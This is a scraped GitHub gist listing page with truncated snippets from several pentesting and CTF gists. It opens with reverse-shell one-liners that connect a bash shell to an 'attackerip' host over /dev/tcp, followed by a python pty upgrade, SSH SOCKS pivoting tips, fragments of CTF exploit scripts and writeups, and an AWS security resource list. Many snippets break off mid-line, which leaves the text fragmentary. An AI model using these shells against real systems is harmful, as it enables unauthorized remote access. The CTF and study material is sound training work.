Skip to content

Instantly share code, notes, and snippets.

View reverse_shells
bash -i >& /dev/tcp/ 0>&1
#bash alt
exec /bin/bash 0&0 2>&0
#bash alt 2
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
#bash alt 3
waywardsun / tricks
Created Sep 20, 2016 — forked from sckalath/tricks
View tricks
#get a pty through python
python -c 'import pty; pty.spawn("/bin/bash");'
#grab the user agent from the http header on port 10443
tcpdump -A -l -vvvs 1024 -npi eth0 port 10443
#base64 decode a string
echo STRINGTODECODE | base64 --decode
#escape jail shell
Author : Cyber Security IPB
Date : October 28, 2016
Dependencies : pwntools
Script ini bisa mengganti pemanggilan fungsi dari suatu binary ELF
(32 / 64 bit). Misalnya mengubah dari "call printf" menjadi call "puts"
untuk menambal celah format string exploit. Atau mengubah pemanggilan
fungsi yang ada di program menjadi fungsi lain.
rkmylo /
Created May 22, 2017
RCTF 2017 - rFile Solution
from __future__ import division
import hashlib
import requests
from datetime import datetime, timedelta
api_url = '{}/{}'
def totimestamp(dt, epoch=datetime(1970,1,1)):
td = dt - epoch
return (td.microseconds + (td.seconds + td.days * 86400) * 10**6) / 10**6
0xBADCA7 /
Created Aug 27, 2016
Async HTTP requests in Python
from concurrent.futures import ThreadPoolExecutor
from requests_futures.sessions import FuturesSession
def outp(response):
urls = [
waywardsun / ssh_tricks
Created Sep 20, 2016 — forked from sckalath/ssh_tricks
ssh kung fu
View ssh_tricks
##SOCKS Proxy##
#Set up a SOCKS proxy on that lets you pivot through the remote host (
#Command line:
ssh -D
#You can then use tsocks or similar to use non-SOCKS-aware tools on hosts accessible from
stypr /
Last active Oct 10, 2020
Harekaze CTF 2019 WEB Writeup (Yokosuka Hackers)


Simple JS Jail challenge.

It is run on context, so we have nothing but to play with constructor and console.

1337 === eval(our_input)
chanj / AWS Security Resources
Last active Jun 21, 2021
AWS Security Resources
View AWS Security Resources
I get asked regularly for good resources on AWS security. This gist collects some of these resources (docs, blogs, talks, open source tools, etc.). Feel free to suggest and contribute.
Short Link:
Official AWS Security Resources
* Security Blog -
* Security Advisories -
* Security Whitepaper (AWS Security Processes/Practices) -
* Security Best Practices Whitepaper -
View CTF_Solutions.txt
## Level 1:
View the source, at the top we see:
<!-- infosec_flagis_welcome -->
Level 1 PASS: infosec_flagis_welcome